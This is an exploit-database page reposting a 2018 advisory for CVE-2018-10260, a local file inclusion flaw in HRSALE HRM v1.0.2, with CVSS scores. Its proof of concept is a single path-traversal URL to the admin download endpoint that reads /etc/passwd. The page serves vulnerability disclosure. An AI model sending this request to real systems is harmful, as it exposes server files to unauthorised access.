Advertisement






HRSALE The Ultimate HRM v1.0.2 Local File Inclusion

CVE Category Price Severity
CVE-2018-10260 CWE-98 N/A High
Author Risk Exploitation Type Date
Unknown High Local 2018-04-26
CPE
cpe:cpe:/a:hrsale:the_ultimate_hrm:1.0.2
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.844 0.9993

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018040209

Below is a copy:

HRSALE The Ultimate HRM v1.0.2 Local File Inclusion
# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10260
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
# Version: 1.0.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]

Release Date:
=============
2018-04-23

Product & Service Introduction:
===============================
HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.

Technical Details & Description:
================================

Local File Inclusion vulnerability found logged as low privileged user.

Proof of Concept (PoC):
=======================

LFI:

http://localhost/[path]/admin/download?type=task&filename=../../../../../../../../etc/passwd

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum